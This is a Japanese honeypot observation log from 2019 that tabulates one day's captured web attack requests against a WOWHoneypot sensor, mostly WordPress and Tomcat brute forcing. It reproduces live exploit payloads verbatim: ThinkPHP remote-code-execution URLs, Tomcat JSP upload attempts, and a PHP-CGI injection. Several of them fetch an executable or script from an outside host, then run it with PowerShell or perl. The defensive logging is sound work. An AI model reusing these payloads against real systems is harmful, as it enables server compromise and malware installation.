WOWHoneypot観察(33日目)
2019/04/18(木)
トータルは3472件でした。
件数 | 概要 | リクエスト |
---|---|---|
2551 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
52 | アクセス | GET / |
33 | WordPressの調査 | GET /wp5/wp-login.php |
33 | WordPressの調査 | GET /wp/wp-login.php |
32 | WordPressのブルートフォース攻撃 | POST /wp5/xmlrpc.php |
32 | WordPressの調査 | POST /wp5/wp-login.php |
32 | WordPressの調査 | POST /wp3/wp-login.php |
32 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp/xmlrpc.php |
32 | WordPressのブルートフォース攻撃 | POST /wp/wp-login.php |
32 | WordPressの調査 | GET /wp6/wp-login.php |
32 | WordPressの調査 | GET /wp3/wp-login.php |
32 | WordPressの調査 | GET /wordpress/wp-login.php |
31 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp6/xmlrpc.php |
31 | WordPressのブルートフォース攻撃 | POST /wp6/wp-login.php |
31 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp3/xmlrpc.php |
31 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wordpress/xmlrpc.php |
31 | WordPressのブルートフォース攻撃 | POST /wordpress/wp-login.php |
31 | WordPressの調査 | GET /wp4/wp-login.php |
31 | WordPressの調査 | GET /cms/wp-login.php |
30 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp4/xmlrpc.php |
30 | WordPressのブルートフォース攻撃 | POST /wp4/wp-login.php |
30 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /cms/xmlrpc.php |
29 | WordPressのブルートフォース攻撃 | POST /cms/wp-login.php |
29 | WordPressの調査 | GET /wp2/wp-login.php |
28 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp2/xmlrpc.php |
28 | WordPressのブルートフォース攻撃 | POST /wp2/wp-login.php |
17 | WordPressの調査 | GET /blog/wp-login.php |
16 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /blog/xmlrpc.php |
16 | WordPressのブルートフォース攻撃 | POST /blog/wp-login.php |
13 | 不正中継の調査 | GET hxxp://checkip.dyndns.com/ |
4 | 調査 | OPTIONS / |
3 | ZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
3 | ZmEuによるphpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
3 | ZmEuによるphpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
2 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
2 | ZmEuによるphpMyAdminの調査 | GET /pma/scripts/setup.php |
2 | D-Linkルータの調査 | GET /HNAP1/ |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | PUT /FxCodeShell.jsp::$DATA |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | PUT /FxCodeShell.jsp/ |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | PUT /FxCodeShell.jsp%20 |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | POST /TP/public/index.php?s=captcha |
1 | CGI版PHPへのApache Magica攻撃 | POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E |
1 | 不正中継の調査 | GET hxxp://www.ceek.jp/?rands=_54563759842233047844248 |
1 | 不正中継の調査 | GET hxxp://www.baidu.com/?rands=_99481943049317162532024 |
1 | アクセス | GET hxxp/1.1" |
1 | WordPressのユーザー情報の調査 | GET /wp6//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wp6//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /wp5//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wp5//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /wp4//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wp4//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /wp3//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wp3//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /wp2//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wp2//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /wp//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wp//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /wordpress//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /wordpress//?author=1 |
1 | ThinkPHPの脆弱性を狙った通信 | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','C:/Windows/temp/ptyjkstuofkhvaa19922.exe');start%20C:/Windows/temp/ptyjkstuofkhvaa19922.exe |
1 | ThinkPHPの脆弱性を狙った通信 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php |
1 | ThinkPHPの脆弱性を狙った通信 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','C:/Windows/temp/ptyjkstuofkhvaa19922.exe');start%20C:/Windows/temp/ptyjkstuofkhvaa19922.exe |
1 | phpMyAdminの調査 | GET /phpmy/scripts/setup.php |
1 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /muieblackcat |
1 | アクセス | GET /favicon.ico |
1 | WordPressのユーザー情報の調査 | GET /cms//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /cms//?author=1 |
1 | WordPressのユーザー情報の調査 | GET /blog//wp-json/wp/v2/users/ |
1 | WordPressのユーザー情報の調査 | GET /blog//?author=1 |
1 | Kubernetesの調査 | GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp |
1 | WordPressの調査 | GET /administrator/index.php |
1 | phpMyAdminの調査 | GET /admin-scripts.asp |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) | GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe |
1 | phpMyAdminの調査 | GET //pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpmyadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpMyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //myadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //MyAdmin/scripts/setup.php |
以下、初めて観測した通信です。
CGI版PHPへのApache Magica攻撃
リクエストのボディ部にスクリプトがありました。
時間があるときにでもしっかり読みたいと思います。
POST //cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
<? system("cd /tmp ; wget hxxp://timradio.hi2.ro/unix ; curl -O hxxp://timradio.hi2.ro/unix ; fetch hxxp://timradio.hi2.ro/unix ; chmod +x unix ; perl unix ; rm -rf unix "); ?>